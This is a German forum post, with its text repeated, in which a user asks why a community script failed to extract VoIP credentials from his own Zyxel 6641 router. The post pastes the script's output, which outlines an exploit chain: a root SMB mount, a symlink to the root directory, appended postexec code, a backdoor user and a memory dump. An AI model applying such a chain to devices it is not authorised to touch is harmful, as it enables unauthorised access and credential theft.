Hallo zusammen,
ich versuche auch gerade mein gestern eingetroffene 6641 Box auszulesen.
Meine Box hatte die Firmware FW 1.00(AAJG.0)b14-4w
Habe dann gemäß der hier geposteten Anleitung die Firmware von MiesMosel in Post #574 verwendet und dann das Script von qwertz12 als root ausgeführt.
Folgende Ausgabe gibt das Skript:
Jemand eine Ahnung was dort nicht geklappt hat oder wie ich doch noch ggf. an die VoIP Anmeldedaten komme?
Viele Grüße,
Mike
ich versuche auch gerade mein gestern eingetroffene 6641 Box auszulesen.
Meine Box hatte die Firmware FW 1.00(AAJG.0)b14-4w
Habe dann gemäß der hier geposteten Anleitung die Firmware von MiesMosel in Post #574 verwendet und dann das Script von qwertz12 als root ausgeführt.
Folgende Ausgabe gibt das Skript:
Code:
Please enter the IP address or hostname of your HomeBox 2 (Zyxel 6641)
or just press enter to use the default value
Host [192.168.1.1]:
Please enter the registrar of your VoIP connection
or just press enter to use the default value
Registrar [sip.alice-voip.de]:
Please enter the sip-proxy of your VoIP connection
or just press enter to use the default value
SIP-proxy [sip.alice-voip.de]:
Please enter the phone numbers to search for.
Seperate numbers with space and use the format
CCPPPPPPPNNNN
or
0PPPPPPPNNNN
(CC=Country-Code, PPPPP=Prefix, NNNN=Number)
For example: 498005900050 498005251378 08005900050 08005251378
If you are not sure which format is correct for your account,
simply specify both formats for your phone numbers!
Phone numbers: 49xxxxxxxx
- trying to ping the box (192.168.1.1)... SUCCESS
SMBPASS dummy
- trying to mount the box: //192.168.1.1/DRIVE1_1...mount -t cifs -o rw,username=root //192.168.1.1/DRIVE1_1 /tmp/tmp.I8hMBL6OUK
SUCCESS
- trying to create symlink (0_link_to_r00t_32140) to root directory... SUCCESS
- trying to unmount /tmp/tmp.I8hMBL6OUK... SUCCESS
- trying to mount the box a second time for exploit preparation... SUCCESS
- trying to append "postexec" code... SUCCESS
- trying to create a user called "bob" with password "alice" SUCCESS
- trying to unmount /tmp/tmp.I8hMBL6OUK... SUCCESS
- trying to mount the box a third time for exploit execution... SUCCESS
- trying to unmount /tmp/tmp.I8hMBL6OUK... SUCCESS
- checking for open port on 192.168.1.1:23000... SUCCESS
- dumping memory from box to usb drive
please be patient: this takes at least 62 seconds...
- trying to mount the box a fourth time to download the memory dump... SUCCESS
- trying to copy PPP username (<BOX-SERIAL>-CC5D4E@.*\.de), a failure here is OK... FAILURE
- trying to copy PPP password (your PIN)...
If this fails, extraction of PPP data will fail!cp: cannot stat ‘/tmp/tmp.I8hMBL6OUK/6441-own_memdump-10220.bin.PIN’: No such file or directory
FAILURE
- downloading the memory dump to /tmp/tmp.NIvd02oyii...cp: cannot stat ‘/tmp/tmp.I8hMBL6OUK/6441-own_memdump-10220.bin’: No such file or directory
FAILURE
Could not copy file!
WRN: Break signalled or aborting script, trying to clean up - this may fail!
rm: cannot remove ‘/tmp/tmp.NIvd02oyii/6441-own_memdump-10220.bin’: No such file or directory
rm: cannot remove ‘/tmp/tmp.NIvd02oyii/6441-own_memdump-10220.bin.PIN’: No such file or directory
rm: cannot remove ‘/tmp/tmp.NIvd02oyii/6441-own_memdump-10220.bin.PPPuser’: No such file or directory
rmdir: failed to remove ‘/tmp/tmp.I8hMBL6OUK’: Device or resource busy
Current smb/cifs mounts are:
Exiting!
Jemand eine Ahnung was dort nicht geklappt hat oder wie ich doch noch ggf. an die VoIP Anmeldedaten komme?
Viele Grüße,
Mike